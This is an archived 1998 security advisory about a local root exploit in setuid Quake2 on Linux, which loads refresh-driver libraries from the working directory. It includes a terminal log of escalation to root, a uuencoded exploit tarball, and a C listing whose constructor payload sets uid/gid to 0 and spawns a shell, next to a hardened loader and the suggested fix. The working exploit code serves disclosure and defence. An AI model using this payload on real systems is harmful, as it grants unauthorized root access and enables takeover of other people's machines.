Quake2 shared library nonsense

Summary
Description: Heh, quake2 is setuid root and loads shared libraries from the working directory. This exploit supplies its own _init, which dlopen(3) runs with root privileges.
Author: kevingeo@CRUZIO.COM
Compromise: root (local)
Vulnerable Systems: Those running a vulnerable version of QuakeII (binary made setuid root for the svgalib software renderer)
Date: 26 January 1998
Details


Date: Mon, 26 Jan 1998 01:16:37 -0500
From: kevingeo@CRUZIO.COM
To: BUGTRAQ@NETSPACE.ORG
Subject: Quake 2 Linux

Vulnerable:
Anyone who made Quake2 setuid root in order to use the svgalib software refresh.

Solution:
chmod u-s quake2, and use ref_softx instead of ref_soft.
If you prefer console-based video, you could get GGI
(http://synergy.caltech.edu/~ggi/), and use KGI with the SVGAlib wrapper
(I haven't tried this).


Exploit:
Quake2 uses dlopen(3) to load its graphics code (which is in a separate
shared library).  dlopen calls the _init function (if applicable) before
it returns.  Quake2 allows you to set which refresh driver to use on the
command line, and loads the .so file from the working directory.
The exploit is a shared library with one function: _init.  It sets the uid
and gid to 0, and spawns a shell.


nop@chrome:~/ref_root> id
uid=501(nop) gid=100(users) groups=100(users)
nop@chrome:~/ref_root> make
gcc -O2 -pipe -o ref_root.o -c ref_root.c -fPIC
ld -m elf_i386 -shared -o ref_root.so -soname ref_root /usr/lib/crtbeginS.o ref_root.o /usr/lib/crtendS.o
nop@chrome:~/ref_root> /usr/games/quake/quake2 +set vid_ref root
couldn't exec default.cfg
couldn't exec config.cfg
Console initialized.
------- Loading ref_root.so -------
sh-2.00#
sh-2.00# id
uid=0(root) gid=0(root) groups=100(users)
sh-2.00#

exploit code follows.
begin 644 ref_root.tgz
M'XL(`/TBS#0``^W534_C,!`&X%[K7_$*+FW5$"<IH2V[7#BL5K`+$N*T0E7J
M3!.+X)1\(!#BOZ_3!5K0"D[E2_-<8L],;"?1*+^B<YKIC%IKY$D9#@9HH2&?
M7:T@#(%P$`;2V[$`3X8R:$&N\U`/ZK**"J!5Y'GU4MUK^4\JRK(Q"II-FN=#
MIJ="/,S&$.U$*3A'/IRYGA.<_+%T*X>CEC-;-3O^N0\A[!+CU2JW+@O7!EU5
M5&3BDV>A*27:V*!H9S&<"U`VF^A@&,(ITZB@^,F>I=VTS$UT0<LC_V^QE_<7
M0KSW6_\XEE]P?7N\VO_;P7W_^](?2-O_GMS9YOY_"VYOV4J=R]K^#7S0]3S+
M==6%RN<WA4Y2FU)=>*/1$`=TI0U^4%XDA)XKQ*8V*JMCPK?:Z+**M]*]E9@-
MV-YK8D*;"A-M=-7IXE9`V?9&KTS_^&>[0L`.Y!F^8\.=:N.6Z<;N(N8UL=^G
MAX?-E*I:QQW9_3=.5L;TF*!K4E?462S7MROT%W?;S!TW/6.,,<888XPQQAAC
3C#'&&&.,,<:^IK\_JS?9`"@``%?4
`
end
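The technique above, written out as an added example: this is not the ref_root.c from the post (that only survives uuencoded in the tarball above), and the loader half is not quake2's own code. Two things are assumed: the payload uses __attribute__((constructor)) instead of defining _init by hand, because current toolchains already supply _init via crti.o/crtn.o and a second definition fails to link; and REF_DIR, ref_path_safe, ref_name_ok and drop_privileges are names invented here to show how a setuid program should have built the path and dropped root before calling dlopen. The payload is compiled in only with -DREF_ROOT_PAYLOAD so the rest of the file builds and runs as an ordinary, unprivileged program.

```c
#define _GNU_SOURCE
#include <ctype.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* ---- 1. payload side (what the post describes; assumed shape) ----
 * dlopen(3) runs a library's initialisers before it returns, so when
 * setuid-root quake2 dlopen()s "ref_root.so" from the cwd this runs
 * with euid 0.  Modern substitute for a hand-written _init.  Build:
 *   gcc -fPIC -shared -DREF_ROOT_PAYLOAD -o ref_root.so ref_root.c
 * then run quake2 +set vid_ref root from that directory. */
#ifdef REF_ROOT_PAYLOAD
__attribute__((constructor))
static void ref_root_init(void)
{
    /* make real and saved ids 0 too, so the shell keeps root */
    if (setgid(0) != 0 || setuid(0) != 0)
        return;                     /* euid != 0: host not vulnerable */
    execl("/bin/sh", "sh", (char *)NULL);
}
#endif

/* ---- 2. loader side: the bug next to the fix ----
 * REF_DIR is an assumed install directory, not a real quake2 path. */
#define REF_DIR "/usr/lib/quake2"

/* What the vulnerable loader effectively does: a relative file name,
 * which the dynamic linker resolves against the working directory. */
int ref_path_unsafe(const char *name, char *out, size_t outlen)
{
    int w = snprintf(out, outlen, "ref_%s.so", name);
    return (w < 0 || (size_t)w >= outlen) ? -1 : 0;
}

/* Accept only a bare driver name: non-empty, <= 32 chars, [A-Za-z0-9_].
 * No '/' or '.', so no traversal and no ".so" smuggled in. */
int ref_name_ok(const char *name)
{
    size_t n = strlen(name);
    if (n == 0 || n > 32)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '_')
            return 0;
    }
    return 1;
}

/* Hardened: validated name, absolute path under a root-owned directory.
 * Returns 0 and fills out; -1 on a rejected name or a short buffer. */
int ref_path_safe(const char *name, char *out, size_t outlen)
{
    if (!ref_name_ok(name))
        return -1;
    int w = snprintf(out, outlen, "%s/ref_%s.so", REF_DIR, name);
    return (w < 0 || (size_t)w >= outlen) ? -1 : 0;
}

/* Give root back permanently before touching user-influenced files.
 * Order: supplementary groups, then gid, then uid (a non-root uid can
 * no longer change its groups).  Returns 0 on success.  The post's
 * "chmod u-s quake2" is the real fix; this is for a program that must
 * keep the bit. */
int drop_privileges(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    if (uid != 0 && setuid(0) == 0)    /* must not be able to come back */
        return -1;
    return 0;
}

/* Usage: ./a.out root -> path is built but it is /usr/lib/quake2/ref_root.so,
 * which an unprivileged user cannot plant; privileges are dropped before
 * the caller would go on to dlopen(path, RTLD_NOW).  dlopen itself is
 * left to the caller so this file links without -ldl. */
int main(int argc, char **argv)
{
    const char *name = argc > 1 ? argv[1] : "soft";
    char path[256];
    if (ref_path_safe(name, path, sizeof path) != 0 || drop_privileges() != 0) {
        fprintf(stderr, "refusing vid_ref '%s'\n", name);
        return 1;
    }
    printf("would dlopen %s as uid %u\n", path, (unsigned)geteuid());
    return 0;
}
```

Note that the name "root" still passes ref_name_ok; what defeats the exploit is that the resulting path is absolute and under a directory the attacker cannot write to, and that root is gone by the time the library's constructor runs. Validation of the name alone (without the absolute path and the privilege drop) would still load ./ref_root.so as root.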

This page is part of Fyodor's exploit world.